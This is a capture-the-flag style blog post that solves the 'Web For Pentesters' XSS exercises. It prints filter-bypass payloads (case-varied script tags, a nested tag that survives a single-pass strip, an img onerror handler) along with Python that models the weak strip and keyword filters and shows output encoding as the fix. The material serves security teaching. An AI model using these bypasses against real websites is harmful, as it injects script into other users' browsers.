Part 1: XSS Exploitation and Code Analysis

By: Chilico

July 18, 2016

Today, I'll solve the XSS challenges from the "Web For Pentesters" vulnerable app and analyze the code behind what we see. Let's start...

Example 1:

[Image: ex1]

What does the code above do? It GETs the parameter "name" and echoes it back to the user. There is no input sanitization in this example, so our XSS payload will look like this:

<script> alert('1st example')</script>

[Image: ex_1]

Example 2:

[Image: ex2]

In this example, the code does exactly the same thing as the first one. The only difference is the sanitization: the pattern defined inside the brackets is what gets replaced in the input. Our payload will look like this:

<ScripT>alert('ex2')</ScripT>

[Image: ex22]

Example 3:

[Image: ex3]

The above code does exactly what the second one does. In this one, the developer also sanitizes capital letters. Our payload will look like this:

<sc<script>ript>alert('ex3')</sc</script>ript>

[Image: ex33]

Example 4:

[Image: ex4]

This code is completely different from the rest. In this one, any use of the word script, capital or not, will kill the application. Our payload must not contain the word script. Our payload will look like this:

<h1><font color=blue>ex4</h1>

[Image: ex44]

<img src=" " onerror=alert('ex4')/>

[Image: ex4_2]
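The four filters described above, modeled in Python and compared with output encoding. This is an added example, not the app's source, which the post shows only as screenshots: the filter functions are assumptions reconstructed from the descriptions, and the payloads are the ones from the post.

```python
import html
import re

# Filters modeled on the post's descriptions (assumed; not the app's source).
def filter_ex1(name):
    return name                                   # echoed back unchanged

def filter_ex2(name):
    name = re.sub(r"<script>", "", name)          # case-sensitive removal
    return re.sub(r"</script>", "", name)

def filter_ex3(name):
    name = re.sub(r"<script>", "", name, flags=re.I)   # case-insensitive,
    return re.sub(r"</script>", "", name, flags=re.I)  # but one pass only

def filter_ex4(name):
    # Refuse any input containing "script"; None stands for the app dying.
    return None if re.search(r"script", name, re.I) else name

def encode_output(name):
    # The fix: encode for the HTML context at output time, no blacklist.
    return html.escape(name, quote=True)

def markup_reaches_page(text):
    # True when a raw tag opener survives into the response body.
    return text is not None and re.search(r"<[a-z]", text, re.I) is not None

# Payloads copied from the post, paired with the filter each one targets.
CASES = [
    (filter_ex1, "<script> alert('1st example')</script>"),
    (filter_ex2, "<ScripT>alert('ex2')</ScripT>"),
    (filter_ex3, "<sc<script>ript>alert('ex3')</sc</script>ript>"),
    (filter_ex4, "<h1><font color=blue>ex4</h1>"),
    (filter_ex4, "<img src=\" \" onerror=alert('ex4')/>"),
]

def evaluate():
    rows = []
    for flt, payload in CASES:
        filtered = flt(payload)
        rows.append((flt.__name__, filtered,
                     markup_reaches_page(filtered),
                     markup_reaches_page(encode_output(payload))))
    return rows

if __name__ == "__main__":
    for name, filtered, raw_hit, encoded_hit in evaluate():
        print(f"{name}: filtered={filtered!r} markup={raw_hit} encoded={encoded_hit}")
```

Every blacklist lets markup through, while the encoded column is False for all five inputs. `html.escape` covers the HTML body and quoted attribute values; values placed in JavaScript or URL contexts need the encoder for that context.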
That's it for now. Stay tuned for more posts in the future...